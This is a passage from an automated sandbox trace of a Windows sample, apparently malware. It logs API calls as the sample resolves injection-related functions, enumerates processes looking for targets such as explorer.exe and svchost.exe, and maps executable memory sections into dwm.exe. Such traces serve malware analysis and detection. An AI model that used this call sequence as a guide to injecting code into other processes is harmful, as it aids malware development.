lpte=0x22dfb70) returned 1 [0165.955] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.956] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.956] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.956] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.956] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.957] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.957] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.957] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.957] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.958] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.958] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.958] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.959] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.959] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.959] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.960] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.960] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.960] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.960] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.961] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.961] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.962] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.962] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.963] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.963] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.963] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.963] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.964] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.964] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.964] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.965] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.965] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0166.043] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x90) returned 0x8c [0166.043] ResumeThread (hThread=0x8c) returned 0x1 [0166.043] CloseHandle (hObject=0x8c) returned 1 [0166.044] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d8) returned 0x8c [0166.044] ResumeThread (hThread=0x8c) returned 0x1 [0166.044] CloseHandle (hObject=0x8c) returned 1 [0166.075] CloseHandle (hObject=0x88) returned 1 [0166.075] VirtualQuery (in: lpAddress=0x530a58, lpBuffer=0x22dfb64, dwLength=0x1c | out: lpBuffer=0x22dfb64*(BaseAddress=0x530000, AllocationBase=0x510000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.075] GetProcessHeap () returned 0x510000 [0166.075] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x530a58 | out: hHeap=0x510000) returned 1 [0166.075] VirtualQuery (in: lpAddress=0x530948, lpBuffer=0x22dfb64, dwLength=0x1c | out: lpBuffer=0x22dfb64*(BaseAddress=0x530000, AllocationBase=0x510000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.075] GetProcessHeap () returned 0x510000 [0166.075] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x530948 | out: hHeap=0x510000) returned 1 [0166.075] RtlExitUserThread (Status=0x0) Process: id = "18" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x1f902000" os_pid = "0x954" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xbdc" cmd_line = "C:\\Windows\\explorer.exe" cur_dir = "C:\\Windows\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 202 os_tid = 0x948 [0164.677] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0164.677] GetProcAddress (hModule=0x76e30000, lpProcName="Sleep") returned 0x76e52b70 [0164.677] GetProcAddress (hModule=0x76e30000, lpProcName="ReadProcessMemory") returned 0x76e7bdc0 [0164.677] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32Next") returned 0x76e7a980 [0164.677] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcatA") returned 0x76e7e110 [0164.677] GetProcAddress (hModule=0x76e30000, lpProcName="ExitThread") returned 0x76f96930 [0164.677] GetProcAddress (hModule=0x76e30000, lpProcName="MultiByteToWideChar") returned 0x76e45b50 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="RtlMoveMemory") returned 0x76e526d8 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="GetLastError") returned 0x76e52dd0 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcmpiA") returned 0x76e340a0 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualAlloc") returned 0x76e467a0 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="OpenThread") returned 0x76e4c560 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="Process32Next") returned 0x76e8fcc0 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleFileNameA") returned 0x76e464a0 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleHandleA") returned 0x76e465e0 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="CreateMutexA") returned 0x76e47210 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0164.678] GetProcAddress (hModule=0x76e30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e321e0 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentThreadId") returned 0x76e43ee0 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="CloseHandle") returned 0x76e52f80 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentProcessId") returned 0x76e45a50 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="WriteProcessMemory") returned 0x76e7bad0 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="SuspendThread") returned 0x76e32f60 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="ResumeThread") returned 0x76e413a0 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="RtlZeroMemory") returned 0x76fa2eb0 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32First") returned 0x76e7aa70 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="CreateRemoteThread") returned 0x76e7c4f0 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="OpenProcess") returned 0x76e4cad0 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcessHeap") returned 0x76e53050 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualFree") returned 0x76e41260 [0164.679] GetProcAddress (hModule=0x76e30000, lpProcName="Process32First") returned 0x76e8fdb0 [0164.680] GetProcAddress (hModule=0x76e30000, lpProcName="HeapFree") returned 0x76e53070 [0164.680] GetProcAddress (hModule=0x76e30000, lpProcName="HeapAlloc") returned 0x76fa33a0 [0164.680] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualQuery") returned 0x76e4bd40 [0164.680] GetProcAddress (hModule=0x76e30000, lpProcName="lstrlenA") returned 0x76e4caf0 [0164.680] GetProcAddress (hModule=0x76e30000, lpProcName="IsWow64Process") returned 0x76e391d0 [0164.680] GetProcAddress (hModule=0x76e30000, lpProcName="HeapReAlloc") returned 0x76f83f20 [0164.680] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0164.680] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptDestroyHash") returned 0x7fefdbfdb00 [0164.680] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptReleaseContext") returned 0x7fefdbfdd10 [0164.680] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0164.680] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptGetHashParam") returned 0x7fefdbfdb20 [0164.680] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptCreateHash") returned 0x7fefdbfdad4 [0164.680] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptAcquireContextA") returned 0x7fefdbf8180 [0164.681] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0164.844] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0164.844] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptBinaryToStringA") returned 0x7fefd0b4220 [0164.844] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0164.851] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0164.851] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsQuery_W") returned 0x7fefc5c01b0 [0164.851] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0164.851] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0164.851] GetProcAddress (hModule=0x76f50000, lpProcName="NtSetInformationProcess") returned 0x76fa14d0 [0164.851] GetProcAddress (hModule=0x76f50000, lpProcName="NtMapViewOfSection") returned 0x76fa1590 [0164.851] GetProcAddress (hModule=0x76f50000, lpProcName="LdrProcessRelocationBlock") returned 0x76ffb110 [0164.851] GetProcAddress (hModule=0x76f50000, lpProcName="NtUnmapViewOfSection") returned 0x76fa15b0 [0164.851] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0164.851] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0164.852] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfA") returned 0x76dabae8 [0164.852] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0164.855] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReadData") returned 0x7fef715e1e0 [0164.855] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpAddRequestHeaders") returned 0x7fef716bdcc [0164.855] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCrackUrl") returned 0x7fef715ba38 [0164.855] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetProxyForUrl") returned 0x7fef715e9c0 [0164.855] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpenRequest") returned 0x7fef71545f8 [0164.855] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0164.856] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCloseHandle") returned 0x7fef71522e0 [0164.856] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSendRequest") returned 0x7fef71574d0 [0164.856] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7fef716a56c [0164.856] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSetOption") returned 0x7fef71539c4 [0164.856] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReceiveResponse") returned 0x7fef715d068 [0164.856] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpConnect") returned 0x7fef7163e3c [0164.856] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0164.856] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xc) returned 0x7fefe26d9a0 [0164.856] GetProcAddress (hModule=0x7fefe260000, lpProcName=0x5) returned 0x7fefe28e450 [0164.856] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xf) returned 0x7fefe261250 [0164.856] VirtualProtect (in: lpAddress=0x50000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x10fcf0 | out: lpflOldProtect=0x10fcf0*=0x40) returned 1 [0164.857] VirtualProtect (in: lpAddress=0x50000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x10fcf0 | out: lpflOldProtect=0x10fcf0*=0x4) returned 1 [0164.859] VirtualQuery (in: lpAddress=0x60023, lpBuffer=0x10fc80, dwLength=0x30 | out: lpBuffer=0x10fc80*(BaseAddress=0x60000, AllocationBase=0x60000, AllocationProtect=0x40, __alignment1=0xfffff880, RegionSize=0x6000, State=0x1000, Protect=0x40, Type=0x40000, __alignment2=0x0)) returned 0x30 [0164.859] GetProcessHeap () returned 0x260000 [0164.859] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x364) returned 0x2937e0 [0164.859] RtlMoveMemory (in: Destination=0x2937e0, Source=0x60023, Length=0x363 | out: Destination=0x2937e0) [0164.859] GetProcessHeap () returned 0x260000 [0164.859] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a00) returned 0x293b50 [0164.859] RtlMoveMemory (in: Destination=0x293b50, Source=0x60385, Length=0x2a00 | out: Destination=0x293b50) [0164.859] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60023) returned 0x0 [0164.860] GetCurrentProcessId () returned 0x954 [0164.860] GetProcessHeap () returned 0x260000 [0164.860] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xa000) returned 0x296560 [0164.861] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0164.863] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0164.863] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0164.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0164.864] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0164.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0164.865] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0164.865] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0164.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0164.866] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0164.866] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0164.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0164.867] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0164.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0164.867] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0164.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0164.868] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0164.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0164.868] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0164.869] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0164.873] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0164.874] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0164.874] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0165.194] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0165.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0165.195] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0165.195] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0165.196] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0165.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0165.197] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0165.197] CloseHandle (hObject=0xd8) returned 1 [0165.197] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0165.200] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0165.200] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0165.200] VirtualQuery (in: lpAddress=0x293b50, lpBuffer=0x10fb10, dwLength=0x30 | out: lpBuffer=0x10fb10*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0165.200] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.201] VirtualQuery (in: lpAddress=0x2937e0, lpBuffer=0x10fa60, dwLength=0x30 | out: lpBuffer=0x10fa60*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0165.201] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0165.201] VirtualQuery (in: lpAddress=0x293b50, lpBuffer=0x10fa60, dwLength=0x30 | out: lpBuffer=0x10fa60*(BaseAddress=0x293000, AllocationBase=0x260000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0165.201] NtCreateSection (in: SectionHandle=0x10fae0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x10fa78, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x10fae0*=0xdc) returned 0x0 [0165.201] NtMapViewOfSection (in: SectionHandle=0xdc, ProcessHandle=0xd8, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x1fa0000, SectionOffset=0x0, ViewSize=0x10fa80*=0xb000) returned 0x0 [0165.390] NtCreateSection (in: SectionHandle=0x10fb58, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x10fa78, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x10fb58*=0xe0) returned 0x0 [0165.390] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xd8, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x2030000, SectionOffset=0x0, ViewSize=0x10fa80*=0x1000) returned 0x0 [0165.390] NtMapViewOfSection (in: SectionHandle=0xdc, ProcessHandle=0xffffffffffffffff, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x60000, SectionOffset=0x0, ViewSize=0x10fa80*=0xb000) returned 0x0 [0165.391] RtlMoveMemory (in: Destination=0x61000, Source=0x293f50, Length=0x0 | out: Destination=0x61000) [0165.391] RtlMoveMemory (in: Destination=0x67000, Source=0x293f50, Length=0x2200 | out: Destination=0x67000) [0165.391] RtlMoveMemory (in: Destination=0x6a000, Source=0x296150, Length=0x400 | out: Destination=0x6a000) [0165.391] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0165.391] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0165.391] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0165.391] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0165.391] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0165.392] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0165.392] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0165.392] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0165.392] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0165.392] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0165.392] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0165.392] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0165.392] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0165.392] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0165.392] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0165.392] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0165.393] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0165.393] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xf) returned 0x7fefe261250 [0165.393] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x60000) returned 0x0 [0165.394] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xffffffffffffffff, BaseAddress=0x10fa70*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x10fa80*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x10fa70*=0x60000, SectionOffset=0x0, ViewSize=0x10fa80*=0x1000) returned 0x0 [0165.394] RtlMoveMemory (in: Destination=0x60000, Source=0x544b8, Length=0x23 | out: Destination=0x60000) [0165.394] RtlMoveMemory (in: Destination=0x60023, 